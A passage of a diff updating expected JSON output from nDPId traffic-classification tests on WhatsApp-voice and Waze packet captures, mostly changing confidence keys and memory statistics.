-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455706979,"flow_last_seen":1561455716020,"flow_idle_time":200000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":64716,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455704557,"flow_last_seen":1561455704557,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455741484,"flow_last_seen":1561455742405,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455707435,"flow_last_seen":1561455707470,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60549,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":263,"flow_first_seen":1561455688704,"flow_last_seen":1561455743434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":21081,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706913,"flow_last_seen":1561455741420,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455687991,"flow_last_seen":1561455688018,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706912,"flow_last_seen":1561455741419,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1561455706912,"flow_last_seen":1561455741419,"flow_idle_time":200000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":3959,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455688445,"flow_last_seen":1561455726442,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1561455731665,"flow_last_seen":1561455741046,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":56328,"dst_port":64282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455741430,"flow_last_seen":1561455741430,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":50191,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1561455689909,"flow_last_seen":1561455690302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":21432,"flow_avg_l4_payload_len":428,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455706979,"flow_last_seen":1561455716020,"flow_idle_time":200000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":64716,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455704557,"flow_last_seen":1561455704557,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455741484,"flow_last_seen":1561455742405,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455707435,"flow_last_seen":1561455707470,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60549,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":263,"flow_first_seen":1561455688704,"flow_last_seen":1561455743434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":21081,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706913,"flow_last_seen":1561455741420,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455687991,"flow_last_seen":1561455688018,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706912,"flow_last_seen":1561455741419,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1561455706912,"flow_last_seen":1561455741419,"flow_idle_time":200000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":3959,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","packets-captured":736,"packets-processed":734,"total-skipped-flows":0,"total-l4-payload-len":128892,"total-not-detected-flows":1,"total-guessed-flows":0,"total-detected-flows":27,"total-detection-updates":8,"total-updates":0,"current-active-flows":0,"total-active-flows":28,"total-idle-flows":28,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":165,"global_ts_msec":1561455743434} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 736/734 @@ -171,9 +171,9 @@ ~~ total active/idle flows...: 28/28 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5937669 bytes -~~ total memory freed........: 5937669 bytes -~~ total allocations/frees...: 118957/118957 +~~ total memory allocated....: 6071303 bytes +~~ total memory freed........: 6071303 bytes +~~ total allocations/frees...: 121719/121719 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 457 chars ~~ json string max len.......: 2425 chars diff --git a/test/results/waze.pcap.out b/test/results/waze.pcap.out index 110882dcf..edd584994 100644 --- a/test/results/waze.pcap.out +++ b/test/results/waze.pcap.out @@ -5,13 +5,13 @@ 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1435587867103,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1435587867103,"pkt":"ABoRAAACABoRAAABCABFAABNMsJAAEAGQsUKECWdriXnUaUQFGaA18okWhY9doAYAVcoEAAAAQEICgAIa2tBJdw4gAAWBXL2KZLscQ7\/r4Q3YR6R6YsREWIs0w=="} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587867443,"flow_last_seen":1435587867443,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1435587867443,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.89.75.198","src_port":46214,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1435587867443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1435587867443,"pkt":"ABoRAAACABoRAAABCABFAABMAABAAEARHHkKCAAByFlLxrSGAHsAOIB9GwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANk705txaHKW"} -00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587867443,"flow_last_seen":1435587867443,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1435587867443,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.89.75.198","src_port":46214,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} +00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587867443,"flow_last_seen":1435587867443,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1435587867443,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.89.75.198","src_port":46214,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1435587867753,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1435587867753,"pkt":"ABoRAAACABoRAAABCABFAABMdHBAABAR2AjIWUvGCggAAQB7tIYAOEf+HAIA7AAAAUgAAAbvyDaVGNk70ieZS5oL2TvTm3FocpbZO9ObncvLHNk705ud0JHn"} 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587867755,"flow_last_seen":1435587867755,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587867755,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1435587867755,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587867755,"pkt":"ABoRAAACABoRAAABCABFAAA8zNlAAEAGoisKCAABQSeAh9aDAFDjx6dUAAAAAKAC\/\/+uwgAAAgQFtAQCCAoACGuNAAAAAAEDAwg="} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1435587867759,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587867759,"pkt":"ABoRAAACABoRAAABCABFAAAodHFAABAGKqhBJ4CHCggAAQBQ1oMcOFir48enVVAS\/\/8NRwAA"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1435587867759,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587867759,"pkt":"ABoRAAACABoRAAABCABFAAAozNpAAEAGoj4KCAABQSeAh9aDAFDjx6dVHDhYrFAQ\/\/8NSAAA"} -00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587867755,"flow_last_seen":1435587867781,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1435587867781,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"xtra1.gpsonextra.net","url":"xtra1.gpsonextra.net\/xtra2.bin","code":0,"content_type":"","user_agent":"Android"}} +00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587867755,"flow_last_seen":1435587867781,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1435587867781,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"xtra1.gpsonextra.net","url":"xtra1.gpsonextra.net\/xtra2.bin","code":0,"content_type":"","user_agent":"Android"}} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1435587868123,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1435587868123,"pkt":"ABoRAAACABoRAAABCABFAABNMsNAAEAGQsQKECWdriXnUaUQFGaA18okWhY9doAYAVcnqgAAAQEICgAIa9FBJdw4gAAWBXL2KZLscQ7\/r4Q3YR6R6YsREWIs0w=="} 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587868632,"flow_last_seen":1435587868632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587868632,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1435587868632,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587868632,"pkt":"ABoRAAACABoRAAABCABFAAA814xAAEAGPpQKCAABNubjrLHZAFCatruPAAAAAKAC\/\/+u6AAAAgQFtAQCCAoACGwDAAAAAAEDAwg="} @@ -25,26 +25,26 @@ 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1435587868644,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868644,"pkt":"ABoRAAACABoRAAABCABFAAAo141AAEAGPqcKCAABNubjrLHZAFCatruQZUlEcVAQ\/\/\/ZDQAA"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1435587868645,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868645,"pkt":"ABoRAAACABoRAAABCABFAAAojYdAAEAGx1YKCAABLjOtto0EAbvOcuGGMY0ee1AQ\/\/87IQAA"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1435587868645,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868645,"pkt":"ABoRAAACABoRAAABCABFAAAoH6pAAEAGNTQKCAABLjOtto0GAbtbbHOupJOMU1AQ\/\/87HwAA"} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868632,"flow_last_seen":1435587868906,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1435587868906,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": 